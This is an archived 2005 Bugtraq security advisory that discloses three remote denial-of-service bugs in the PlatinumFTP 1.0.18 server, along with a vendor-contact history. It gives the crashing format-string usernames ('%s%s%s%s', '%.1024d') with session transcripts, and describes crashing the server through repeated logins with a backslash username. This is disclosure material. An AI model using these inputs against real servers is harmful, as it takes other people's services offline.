PlatinumFTP 1.0.18 remote DoS

From: ports (ml_at_portsonline.net)
Date: 03/12/05

  • Next message: SecurityReason: "[SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB"
    Date: Sat, 12 Mar 2005 17:04:31 +0100
    To: bugtraq@securityfocus.com
    
    

    Application: PlantinumFTP
    Site: http://www.roboshareware.com/indexplatinumftp.php
    Version: 1.0.18 and maybe lower
    OS: Windows
    Bug: Remote Denial of Service

    =====
    Product:
    PlatinumFTPserver simplifies management of all your Ftp clients with
    regards to sending and receiving program and data files over an IP
    connection.

    =====
    About:
    I didn't found any informations about the Bugs I've found and the
    vendor doesn't seem to be interested in fixing problems (see History).
    Since PlatinumFTP isn't a mainstream server I decided to make this
    Disclosure.

    Well, I found 3 different ways do shut down (denial of service) a
    PlatinumFTP 1.0.18 server. At least you doesn't need a valid user

    =====
    First Bug:
    You can stop the server using %s%s%s%s as username.

    -------------------- schnipp --------------------
    ports@boom:~$ ftp 192.168.10.101
    Connected to 192.168.10.101.
    220-PlatinumFTPserver V1.0.18
    220 Enter login details
    Name (192.168.10.101:ports): %s%s%s%s
    421 Service not available, remote server has closed connection
    Login failed.
    No control connection for command: Transport endpoint is not connected
    ftp>
    -------------------- schnapp --------------------

    =====
    Second Bug:
    You can stop the server using %.1024d as username.

    -------------------- schnipp --------------------
    ports@boom:~$ ftp 192.168.10.101
    Connected to 192.168.10.101.
    220-PlatinumFTPserver V1.0.18
    220 Enter login details
    Name (192.168.10.101:ports): %.1024d
    331 Password required for 000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000421 Service not available, remote server
    has closed connection
    Login failed.
    No control connection for command: Transport endpoint is not connected
    ftp>
    -------------------- schnapp --------------------

    =====
    Third Bug:
    Well, shuting down a server using the third bug is, compared to the
    first Bugs, really tricky *cough*. If you put in a \ as username the
    Server will show a requester on his console saying 'Incorrect Format:
    HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'.
    The ftp login process for the current session will stop until someone
    affirmed this message.

    I wrote a little perl script to see if it's possible to shut the server
    down and it's working. You just have to connect a couple of times using
    the username \ and after a few connections (>50) the server will crash.

    Since most of you guys know how to write a script like that I doens't
    attach it :) Of course you can find them later on my homepage.

    =====
    History:
    2005-03-05: Found the Bugs and mailed the vendor
    2005-03-07: Mailed the vendor again using all mailaddresse I found
    2005-03-10: Created a yahoo-account *sigh* to make a forum post
    2005-03-12: Still no response...

    Well, now let's count the hours/days until someone is telling me I'm a
    fool because I didn't made a working exploit out of it.

    ports


  • Next message: SecurityReason: "[SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB"

    Relevant Pages

    • Re: FTP question
      ... |> I have one server that has had connectivity issues this past week ... |> directed at trying yet another ftp software. ... |> or an error about the socket connection. ... |> own modem and a Linksey router using Xp 64bit system. ...
      (microsoft.public.windowsxp.network_web)
    • [Full-disclosure] PlatinumFTP 1.0.18 remote DoS
      ... PlatinumFTPserver simplifies management of all your Ftp clients with ... PlatinumFTP 1.0.18 server. ... remote server has closed connection ... Second Bug: ...
      (Full-Disclosure)
    • Re: Windows 2003 SP2 and FTP
      ... with the windows firewall for our exchange servers. ... connect to the exchange server, we must disable the protect all connections ... Do you have anonymous access to your ftp enabled? ... "Connection closed by remote host". ...
      (microsoft.public.inetserver.iis.ftp)
    • Re: Telnet/ftp problems SBS2000
      ... | through the server to get internet access everything works. ... | client uses an internet backup company to backup his really vital data, ... I understand that you cannot use ftp service to ... the connection can be established ...
      (microsoft.public.windows.server.sbs)
    • Re: bug in java.net.Socket??
      ... I've been trying to get a passive ftp server working, but unfortunately, ... there seems to be a VERY low level bug in the Socket command that makes ... server is already serving a connection new connection attempts are ... Now I don't know for sure, but I STRONGLY suspect that it is a java bug. ...
      (comp.lang.java.programmer)